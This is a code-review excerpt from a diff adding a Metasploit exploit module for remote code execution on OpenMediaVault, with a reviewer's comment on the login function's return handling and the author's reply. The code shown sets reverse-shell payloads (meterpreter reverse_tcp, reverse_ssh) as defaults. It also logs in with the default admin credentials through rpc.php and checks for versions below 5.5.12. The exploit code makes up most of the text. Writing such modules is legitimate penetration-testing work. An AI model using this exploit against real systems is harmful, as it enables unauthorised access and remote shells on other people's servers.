modules/exploits/unix/webapp/openmediavault_rpc_rce.rb

```diff
@@ -0,0 +1,219 @@
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Payload' => { 'BadChars' => "\x00" },
+        'DisclosureDate' => 'Sep 28 2020',
+        'Targets' =>
+          [
+            [
+              'Automatic (Linux Dropper)',
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
+              'Type' => :linux_dropper
+            ],
+            [
+              'Automatic (Unix In-Memory)',
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_ssh' },
+              'Type' => :unix_memory
+            ]
+          ],
+        'Privileged' => false,
+        'DefaultTarget' => 0
+      )
+    )
+    register_options(
+      [
+        OptString.new('HttpUsername', [ true, 'User to login with', 'admin']),
+        OptString.new('HttpPassword', [ true, 'Password to login with', 'openmediavault']),
+      ]
+    )
+  end
+
+  def user
+    datastore['HttpUsername']
+  end
+
+  def pass
+    datastore['HttpPassword']
+  end
+
+  def get_target(_opts = {})
+    res = send_request_cgi({
+      'uri' => @uri,
+      'method' => 'POST',
+      'cookie' => @cookie.to_s,
+      'data' => "{
+        \"service\":\"System\",
+        \"method\":\"getInformation\",
+        \"params\":null,
+        \"options\":{
+          \"updatelastaccess\":false
+        }
+      }"
+    })
+    version = res.body.scan(/"version\":\"(\d.\d.{0,1}\d{0,1}.{0,1}\d{0,1})/).flatten.first
+    if version.nil?
+      print_error("#{peer} - Unable to grab version of OpenMediaVault installed on target!")
+      return nil
+    end
+    print_good("#{peer} - OpenMediaVault version #{version} identified.")
+    if Gem::Version.new(version) >= (Gem::Version.new('5.5.12'))
+      return nil
+    end
+
+    return version
+  end
+
+  def login(user, pass, _opts = {})
+    @uri = normalize_uri(target_uri.path, '/rpc.php')
+    print_status("#{peer} - Authenticating using \"#{user}:#{pass}\" credentials...")
+    res = send_request_cgi({
+      'uri' => @uri,
+      'method' => 'POST',
+      'data' => "{
+        \"service\":\"Session\",
+        \"method\":\"login\",
+        \"params\":{
+          \"username\":\"#{user}\",
+          \"password\":\"#{pass}\"
+        },
+        \"options\":null
+      }",
+      'ctype' => 'application/json'
+    })
+    unless res
+      # We return nil here, as callers should handle this case
+      # specifically with their own unique error message.
+      return nil
+    end
+
+    if res.code == 200
+      print_good("#{peer} - Authenticated successfully.")
+      @cookie = res.get_cookies
+    elsif res.code == 401
+      print_error("#{peer} - Authentication failed.")
+    else
+      print_error("#{peer} - The host responded with an unexpected status code: #{res.code}.")
+    end
+    return res
```

Comment:
The way this function is used implies that a `nil` response is expected to indicate login failure or connection failure.

These conditional branches are inconsistent and complicates checking whether the method worked as intended. For example, a `401` response will cause this method to return `res` (a HTTP response object), which implies that authentication was successful.

Reply:
Updated, please check.